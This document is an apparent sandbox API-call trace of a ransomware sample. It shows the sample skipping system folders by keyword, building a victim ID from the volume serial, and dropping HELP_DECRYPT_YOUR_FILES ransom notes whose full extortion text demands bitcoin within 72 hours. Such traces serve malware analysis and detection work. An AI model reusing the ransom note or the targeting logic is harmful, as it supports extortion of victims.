	[0178.592] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.592] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="appdata") returned 0x0
	[0178.592] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.593] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="application data") returned 0x0
	[0178.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.593] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="winnt") returned 0x0
	[0178.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.593] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="tmp") returned 0x0
	[0178.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.593] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="cache") returned 0x0
	[0178.593] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.594] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="temporary internet files") returned 0x0
	[0178.594] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.594] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="webcache") returned 0x0
	[0178.594] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.599] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="inetcache") returned 0x0
	[0178.599] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.600] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="nvidia") returned 0x0
	[0178.600] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.600] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="packages") returned 0x0
	[0178.600] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.600] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="cookies") returned 0x0
	[0178.600] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.600] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="programdata") returned 0x0
	[0178.601] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0178.601] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PostRebootEventCache.V2", cAlternateFileName="POSTRE~1.V2")) returned 1
	[0178.601] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PostRebootEventCache.V2", cAlternateFileName="POSTRE~1.V2")) returned 0
	[0178.601] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0178.601] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0178.602] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\SoftwareDistribution" | out: lpString1="C:\\Users\\All Users\\SoftwareDistribution") returned="C:\\Users\\All Users\\SoftwareDistribution"
	[0178.602] lstrcatW (in: lpString1="C:\\Users\\All Users\\SoftwareDistribution", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\SoftwareDistribution\\*.*") returned="C:\\Users\\All Users\\SoftwareDistribution\\*.*"
	[0178.602] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.602] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.602] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\SoftwareDistribution\\HELP_DECRYPT_YOUR_FILES.TXT") returned 67
	[0178.602] CreateFileW (lpFileName="C:\\Users\\All Users\\SoftwareDistribution\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\softwaredistribution\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.604] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0178.604] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0178.607] CloseHandle (hObject=0x380) returned 1
	[0178.607] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.608] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.608] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0178.609] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0178.609] CreateFileW (lpFileName="C:\\Users\\All Users\\SoftwareDistribution\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\softwaredistribution\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.609] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0178.610] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0178.610] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0178.610] CloseHandle (hObject=0x380) returned 1
	[0178.611] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.611] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.616] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0178.616] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\SoftwareDistribution\\HELP_DECRYPT_YOUR_FILES.HTML") returned 68
	[0178.616] CreateFileW (lpFileName="C:\\Users\\All Users\\SoftwareDistribution\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\softwaredistribution\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.620] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0178.620] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0178.623] CloseHandle (hObject=0x380) returned 1
	[0178.623] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.624] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.624] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.624] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0178.663] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.663] CreateFileW (lpFileName="C:\\Users\\All Users\\SoftwareDistribution\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\softwaredistribution\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.663] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0178.664] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.664] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0178.664] CloseHandle (hObject=0x380) returned 1
	[0178.664] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\SoftwareDistribution\\*.*" (normalized: "c:\\users\\all users\\softwaredistribution\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x83fe8dad, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0178.664] lstrlenW (lpString="C:\\Users\\All Users\\SoftwareDistribution\\*.*") returned 43
	[0178.665] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.665] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\SoftwareDistribution\\*.*", cchLength=0x2b | out: lpsz="c:\\users\\all users\\softwaredistribution\\*.*") returned 0x2b
	[0178.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.665] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="windows") returned 0x0
	[0178.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.665] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="boot") returned 0x0
	[0178.665] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.666] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="system volume information") returned 0x0
	[0178.666] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.666] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.666] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.666] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="temp") returned 0x0
	[0178.666] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.666] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="program files") returned 0x0
	[0178.666] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.667] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.667] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.667] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="appdata") returned 0x0
	[0178.667] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.667] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="application data") returned 0x0
	[0178.667] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.667] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="winnt") returned 0x0
	[0178.667] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.668] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="tmp") returned 0x0
	[0178.668] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.668] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="cache") returned 0x0
	[0178.668] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.668] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="temporary internet files") returned 0x0
	[0178.668] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.668] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="webcache") returned 0x0
	[0178.668] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.669] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="inetcache") returned 0x0
	[0178.669] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.669] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="nvidia") returned 0x0
	[0178.669] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.669] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="packages") returned 0x0
	[0178.669] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.669] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="cookies") returned 0x0
	[0178.669] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.670] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\*.*", lpSrch="programdata") returned 0x0
	[0178.670] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0178.670] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0178.670] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x83fe8dad, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0178.670] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0178.670] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83fe8dad, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x83fe8dad, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8405b1c0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0178.670] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83fc2bf7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x83fc2bf7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x83fe8dad, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0178.670] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PostRebootEventCache.V2", cAlternateFileName="POSTRE~1.V2")) returned 1
	[0178.671] lstrcmpW (lpString1="PostRebootEventCache.V2", lpString2="..") returned 1
	[0178.671] lstrcmpW (lpString1="PostRebootEventCache.V2", lpString2=".") returned 1
	[0178.671] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\SoftwareDistribution" | out: lpString1="C:\\Users\\All Users\\SoftwareDistribution") returned="C:\\Users\\All Users\\SoftwareDistribution"
	[0178.671] lstrcatW (in: lpString1="C:\\Users\\All Users\\SoftwareDistribution", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\SoftwareDistribution\\") returned="C:\\Users\\All Users\\SoftwareDistribution\\"
	[0178.671] lstrcatW (in: lpString1="C:\\Users\\All Users\\SoftwareDistribution\\", lpString2="PostRebootEventCache.V2" | out: lpString1="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2") returned="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2"
	[0178.671] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2" | out: lpString1="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2") returned="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2"
	[0178.671] lstrcatW (in: lpString1="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\") returned="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\"
	[0178.671] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\" | out: lpString1="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\") returned="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\"
	[0178.671] lstrcatW (in: lpString1="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\*.*") returned="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\*.*"
	[0178.672] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\*.*" (normalized: "c:\\users\\all users\\softwaredistribution\\postrebooteventcache.v2\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0178.678] lstrlenW (lpString="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\*.*") returned 67
	[0178.678] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.678] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\*.*", cchLength=0x43 | out: lpsz="c:\\users\\all users\\softwaredistribution\\postrebooteventcache.v2\\*.*") returned 0x43
	[0178.678] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.678] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\postrebooteventcache.v2\\*.*", lpSrch="windows") returned 0x0
	[0178.679] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.679] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\postrebooteventcache.v2\\*.*", lpSrch="boot") returned="booteventcache.v2\\*.*"
	[0178.679] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0178.679] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2" | out: lpString1="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2") returned="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2"
	[0178.679] lstrcatW (in: lpString1="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\*.*") returned="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\*.*"
	[0178.679] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.679] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.680] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\HELP_DECRYPT_YOUR_FILES.TXT") returned 91
	[0178.680] CreateFileW (lpFileName="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\softwaredistribution\\postrebooteventcache.v2\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0178.680] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0178.680] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0178.690] CloseHandle (hObject=0x384) returned 1
